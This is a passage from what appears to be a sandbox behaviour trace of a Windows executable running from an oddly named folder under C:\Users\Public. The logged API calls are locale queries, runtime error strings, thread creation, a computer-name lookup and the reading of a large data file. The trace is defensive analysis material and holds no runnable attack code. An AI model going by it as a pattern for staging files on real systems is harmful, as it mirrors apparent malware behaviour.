phkResult=0x345f15c | out: phkResult=0x345f15c*=0x0) returned 0x2 [0262.991] lstrcpynA (in: lpString1=0x345f047, lpString2="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E", iMaxLength=261 | out: lpString1="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E" [0262.991] GetThreadLocale () returned 0x409 [0262.991] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x345f157, cchData=5 | out: lpLCData="ENU") returned 4 [0262.991] lstrlenA (lpString="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned 32 [0262.991] lstrcpynA (in: lpString1=0x345f062, lpString2="ENU", iMaxLength=234 | out: lpString1="ENU") returned="ENU" [0262.991] LoadLibraryExA (lpLibFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0262.991] lstrcpynA (in: lpString1=0x345f062, lpString2="EN", iMaxLength=234 | out: lpString1="EN") returned="EN" [0262.992] LoadLibraryExA (lpLibFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffdf, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0262.992] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2fe3830 [0262.992] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x5210000 [0262.992] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2fc0118 [0262.992] VirtualAlloc (lpAddress=0x5210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5210000 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffde, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffdc, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffdd, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffd0, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffd8, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffef, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffec, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffd3, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffd2, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffe4, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0262.992] LoadStringA (in: hInstance=0x4be0000, uID=0xffe5, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xffe6, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xffe3, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xffe1, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xffff, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfffe, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfffd, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfffc, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfffb, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfffa, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff9, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff8, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff7, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff6, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff5, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff4, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff3, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff2, lpBuffer=0x345f290, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xfff0, lpBuffer=0x345f27c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0262.993] LoadStringA (in: hInstance=0x4be0000, uID=0xffe0, lpBuffer=0x345f27c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0262.993] GetVersionExA (in: lpVersionInformation=0x345f614*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x345f6c0, dwMinorVersion=0x77b7e0ed, dwBuildNumber=0x784bcc, dwPlatformId=0xfffffffe, szCSDVersion="<\x9f»w7\x1fxw,`\x84w¨°û\x02V4¾\x04£!¾\x04¬öE\x03Ð!¾\x04`öE\x03dH¿\x04\x0e") | out: lpVersionInformation=0x345f614*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0262.994] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77780000 [0262.994] GetProcAddress (hModule=0x77780000, lpProcName="GetDiskFreeSpaceExA") returned 0x7780f46f [0262.994] GetThreadLocale () returned 0x409 [0262.994] GetThreadLocale () returned 0x409 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Jan") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="January") returned 8 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Feb") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="February") returned 9 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Mar") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="March") returned 6 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Apr") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="April") returned 6 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="May") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="May") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Jun") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="June") returned 5 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Jul") returned 4 [0262.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="July") returned 5 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Aug") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="August") returned 7 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Sep") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="September") returned 10 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Oct") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="October") returned 8 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Nov") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="November") returned 9 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Dec") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="December") returned 9 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Sun") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Sunday") returned 7 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Mon") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Monday") returned 7 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Tue") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Tuesday") returned 8 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Wed") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Wednesday") returned 10 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Thu") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Thursday") returned 9 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Fri") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Friday") returned 7 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Sat") returned 4 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x345f4ec, cchData=256 | out: lpLCData="Saturday") returned 9 [0262.995] GetThreadLocale () returned 0x409 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x345f548, cchData=256 | out: lpLCData="$") returned 2 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x345f548, cchData=256 | out: lpLCData="0") returned 2 [0262.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x345f548, cchData=256 | out: lpLCData="0") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x345f640, cchData=2 | out: lpLCData=",") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x345f640, cchData=2 | out: lpLCData=".") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x345f548, cchData=256 | out: lpLCData="2") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x345f640, cchData=2 | out: lpLCData="/") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x345f548, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0262.996] GetThreadLocale () returned 0x409 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x345f514, cchData=256 | out: lpLCData="1") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x345f548, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0262.996] GetThreadLocale () returned 0x409 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x345f514, cchData=256 | out: lpLCData="1") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x345f640, cchData=2 | out: lpLCData=":") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x345f548, cchData=256 | out: lpLCData="AM") returned 3 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x345f548, cchData=256 | out: lpLCData="PM") returned 3 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x345f548, cchData=256 | out: lpLCData="0") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x345f548, cchData=256 | out: lpLCData="0") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x345f548, cchData=256 | out: lpLCData="0") returned 2 [0262.996] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x345f640, cchData=2 | out: lpLCData=",") returned 2 [0262.996] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x77a00000 [0262.997] GetProcAddress (hModule=0x77a00000, lpProcName="VariantChangeTypeEx") returned 0x77a04c28 [0262.997] GetProcAddress (hModule=0x77a00000, lpProcName="VarNeg") returned 0x77a7c802 [0262.997] GetProcAddress (hModule=0x77a00000, lpProcName="VarNot") returned 0x77a7ec66 [0262.998] GetProcAddress (hModule=0x77a00000, lpProcName="VarAdd") returned 0x77a25934 [0262.998] GetProcAddress (hModule=0x77a00000, lpProcName="VarSub") returned 0x77a7d332 [0262.998] GetProcAddress (hModule=0x77a00000, lpProcName="VarMul") returned 0x77a7dbd4 [0262.999] GetProcAddress (hModule=0x77a00000, lpProcName="VarDiv") returned 0x77a7e405 [0262.999] GetProcAddress (hModule=0x77a00000, lpProcName="VarIdiv") returned 0x77a7f00a [0262.999] GetProcAddress (hModule=0x77a00000, lpProcName="VarMod") returned 0x77a7f15e [0263.000] GetProcAddress (hModule=0x77a00000, lpProcName="VarAnd") returned 0x77a25a98 [0263.000] GetProcAddress (hModule=0x77a00000, lpProcName="VarOr") returned 0x77a7ecfa [0263.000] GetProcAddress (hModule=0x77a00000, lpProcName="VarXor") returned 0x77a7ee2e [0263.000] GetProcAddress (hModule=0x77a00000, lpProcName="VarCmp") returned 0x77a1b0dc [0263.001] GetProcAddress (hModule=0x77a00000, lpProcName="VarI4FromStr") returned 0x77a16fab [0263.001] GetProcAddress (hModule=0x77a00000, lpProcName="VarR4FromStr") returned 0x77a201a0 [0263.001] GetProcAddress (hModule=0x77a00000, lpProcName="VarR8FromStr") returned 0x77a1699e [0263.002] GetProcAddress (hModule=0x77a00000, lpProcName="VarDateFromStr") returned 0x77a26ba7 [0263.002] GetProcAddress (hModule=0x77a00000, lpProcName="VarCyFromStr") returned 0x77a46c12 [0263.002] GetProcAddress (hModule=0x77a00000, lpProcName="VarBoolFromStr") returned 0x77a1dbd1 [0263.002] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromCy") returned 0x77a27fdc [0263.003] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromDate") returned 0x77a17a2a [0263.003] GetProcAddress (hModule=0x77a00000, lpProcName="VarBstrFromBool") returned 0x77a20355 [0263.003] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x61c [0263.003] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x620 [0263.003] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x624 [0263.004] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4bf47f4, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x4bf6884 | out: lpThreadId=0x4bf6884*=0x62c) returned 0x628 [0263.004] LocalFree (hMem=0x2fb4d18) returned 0x0 Thread: id = 144 os_tid = 0x62c [0263.015] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fb4d48 [0263.015] GetComputerNameA (in: lpBuffer=0x534fb38, nSize=0x534fb34 | out: lpBuffer="N3EERVTWSM", nSize=0x534fb34) returned 1 [0263.015] CreateFileA (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.51N3E" (normalized: "c:\\users\\public\\n3eg\\n3eg1.51n3e"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0263.016] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x534faf0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x534faf0*=0) returned 0x0 [0263.016] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x534fae8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x534fae8*=0) returned 0x0 [0263.017] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x534fae8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x534fae8*=0) returned 0x290a01 [0263.017] SetFilePointer (in: hFile=0x618, lDistanceToMove=0, lpDistanceToMoveHigh=0x534fae8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x534fae8*=0) returned 0x0 [0263.017] GlobalLock (hMem=0xcc0084) returned 0x5350020 [0263.017] ReadFile (in: hFile=0x618, lpBuffer=0x5350020, nNumberOfBytesToRead=0x290a01, lpNumberOfBytesRead=0x534fb04, lpOverlapped=0x0 | out: lpBuffer=0x5350020*, lpNumberOfBytesRead=0x534fb04*=0x290a01, lpOverlapped=0x0) returned 1 [0263.117] CloseHandle (hObject=0x618) returned 1 [0263.117] GlobalLock (hMem=0xcc008c) returned 0x2fe4830 [0263.118] GlobalHandle (pMem=0x2fe4830) returned 0xcc008c [0263.118] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.118] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x4000, uFlags=0x2) returned 0xcc008c [0263.118] GlobalLock (hMem=0xcc008c) returned 0x2fe6840 [0263.119] GlobalHandle (pMem=0x2fe6840) returned 0xcc008c [0263.119] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.119] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x6000, uFlags=0x2) returned 0xcc008c [0263.119] GlobalLock (hMem=0xcc008c) returned 0x2fe6840 [0263.120] GlobalHandle (pMem=0x2fe6840) returned 0xcc008c [0263.120] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.120] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x8000, uFlags=0x2) returned 0xcc008c [0263.120] GlobalLock (hMem=0xcc008c) returned 0x2fe6840 [0263.120] GlobalHandle (pMem=0x2fe6840) returned 0xcc008c [0263.120] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.120] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xa000, uFlags=0x2) returned 0xcc008c [0263.121] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.122] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.122] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.122] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xc000, uFlags=0x2) returned 0xcc008c [0263.180] GlobalLock (hMem=0xcc008c) returned 0x55fa058 [0263.181] GlobalHandle (pMem=0x55fa058) returned 0xcc008c [0263.181] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.181] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xe000, uFlags=0x2) returned 0xcc008c [0263.181] GlobalLock (hMem=0xcc008c) returned 0x55fa058 [0263.182] GlobalHandle (pMem=0x55fa058) returned 0xcc008c [0263.182] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.182] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x10000, uFlags=0x2) returned 0xcc008c [0263.183] GlobalLock (hMem=0xcc008c) returned 0x5608068 [0263.184] GlobalHandle (pMem=0x5608068) returned 0xcc008c [0263.184] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.185] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x12000, uFlags=0x2) returned 0xcc008c [0263.185] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.186] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.186] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.186] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x14000, uFlags=0x2) returned 0xcc008c [0263.186] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.187] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.187] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.187] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x16000, uFlags=0x2) returned 0xcc008c [0263.187] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.188] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.188] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.188] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x18000, uFlags=0x2) returned 0xcc008c [0263.188] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.189] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.189] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.189] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1a000, uFlags=0x2) returned 0xcc008c [0263.189] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.190] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.190] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.190] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1c000, uFlags=0x2) returned 0xcc008c [0263.190] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.191] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.191] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.191] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1e000, uFlags=0x2) returned 0xcc008c [0263.191] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.192] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.192] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.192] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x20000, uFlags=0x2) returned 0xcc008c [0263.192] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.193] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.193] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.193] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x22000, uFlags=0x2) returned 0xcc008c [0263.193] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.194] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.194] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.194] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x24000, uFlags=0x2) returned 0xcc008c [0263.194] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.195] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.195] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.195] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x26000, uFlags=0x2) returned 0xcc008c [0263.195] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.196] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.196] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.196] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x28000, uFlags=0x2) returned 0xcc008c [0263.196] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.197] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.197] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.197] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x2a000, uFlags=0x2) returned 0xcc008c [0263.200] GlobalLock (hMem=0xcc008c) returned 0x5618058 [0263.201] GlobalHandle (pMem=0x5618058) returned 0xcc008c [0263.201] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.201] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x2c000, uFlags=0x2) returned 0xcc008c [0263.201] GlobalLock (hMem=0xcc008c) returned 0x5618058 [0263.202] GlobalHandle (pMem=0x5618058) returned 0xcc008c [0263.202] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.202] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x2e000, uFlags=0x2) returned 0xcc008c [0263.206] GlobalLock (hMem=0xcc008c) returned 0x5644068 [0263.207] GlobalHandle (pMem=0x5644068) returned 0xcc008c [0263.207] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.207] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x30000, uFlags=0x2) returned 0xcc008c [0263.207] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.208] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.208] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.208] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x32000, uFlags=0x2) returned 0xcc008c [0263.208] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.209] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.209] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.209] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x34000, uFlags=0x2) returned 0xcc008c [0263.209] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.210] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.210] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.210] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x36000, uFlags=0x2) returned 0xcc008c [0263.210] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.211] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.211] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.211] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x38000, uFlags=0x2) returned 0xcc008c [0263.211] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.212] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.212] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.212] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x3a000, uFlags=0x2) returned 0xcc008c [0263.212] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.213] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.213] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.213] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x3c000, uFlags=0x2) returned 0xcc008c [0263.213] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.214] GlobalHandle (pMem=0x55f0048) returned 0xcc008c 